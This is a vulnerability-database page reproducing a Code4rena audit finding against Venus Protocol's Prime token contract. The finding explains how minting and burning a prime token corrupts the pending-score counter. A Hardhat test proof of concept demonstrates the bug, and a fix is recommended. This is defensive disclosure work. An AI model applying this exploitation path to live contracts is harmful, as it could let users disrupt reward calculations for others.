Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
code423n4Code4renaCODE423N4:2023-09-VENUS-FINDINGS-ISSUES-586
HistoryOct 04, 2023 - 12:00 a.m.

Update score system can be bricked

2023-10-0400:00:00
Code4rena
github.com
1
manual review
prime token
reward system
pending scores
update alpha
update multipliers

6.9 Medium

AI Score

Confidence

Low

JSON

Lines of code

Vulnerability details

Impact

The updateScores function is used to manually update users scores, devlopers have shared their reasoning of this in the documentation. Any change in the alpha and the multipliers will unbalace the reward system because the change cannot be propagated to all users, the updateScores allow to propagate this change.

The issue is that this system can be bricked. If a user that did not have a prime token during the change of multipliers or alpha mints a prime token and then burn it, it will decrement the variable pendingScoreUpdates which means that one of the real pending scores to be updated will not get updated. For example, if 10 users do this, then 10 pending scores could not be updated.

PoC

Add the following in the update score tests of Prime.ts:

it.only("Update score system can be bricked", async () => {
        await xvs.connect(user3).approve(xvsVault.address, bigNumber18.mul(2000));
        await xvsVault.connect(user3).deposit(xvs.address, 0, bigNumber18.mul(2000));

        await xvs.connect(user2).approve(xvsVault.address, bigNumber18.mul(2000));
        await xvsVault.connect(user2).deposit(xvs.address, 0, bigNumber18.mul(2000));

        await mine(90 * 24 * 60 * 60);
        await prime.connect(user3).claim();

        await prime.updateAlpha(4, 5);
       
        const totalScoreUpdatesRequired = await prime.totalScoreUpdatesRequired();
        const pendingScoreUpdates = await prime.pendingScoreUpdates();
        
        // User1 and User3 scores are pending to be updated.
        expect(totalScoreUpdatesRequired).to.be.equal(2);
        expect(pendingScoreUpdates).to.be.equal(2);
        
        // Update score system working properly
        await prime.updateScores([user1.getAddress(), user3.getAddress()]);

        await prime.updateAlpha(1, 2);

        const totalScoreUpdatesRequired2 = await prime.totalScoreUpdatesRequired();
        const pendingScoreUpdates2 = await prime.pendingScoreUpdates();
        
        // User1 and User3 scores are pending to be updated again.
        expect(totalScoreUpdatesRequired2).to.be.equal(2);
        expect(pendingScoreUpdates2).to.be.equal(2);

        await prime.connect(user2).claim();
        await xvsVault.connect(user2).requestWithdrawal(xvs.address, 0, bigNumber18.mul(2000));

        // Now update score system is broken. You can only update either user1 or user3 but not both.
        await prime.updateScores([user1.getAddress(), user3.getAddress()]);
      })

Tools Used

Manual Review

Recommended Mitigation Steps

When burning someone prime token do not decrement pendingScoreUpdates

Assessed type

Other

The text was updated successfully, but these errors were encountered:

All reactions

6.9 Medium

AI Score

Confidence

Low

JSON